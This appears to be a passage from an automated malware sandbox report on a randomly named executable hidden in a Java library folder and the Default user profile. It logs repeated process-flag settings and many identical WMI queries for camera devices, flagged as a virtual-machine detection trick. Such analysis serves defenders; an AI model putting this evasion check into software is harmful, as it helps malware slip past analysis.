                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
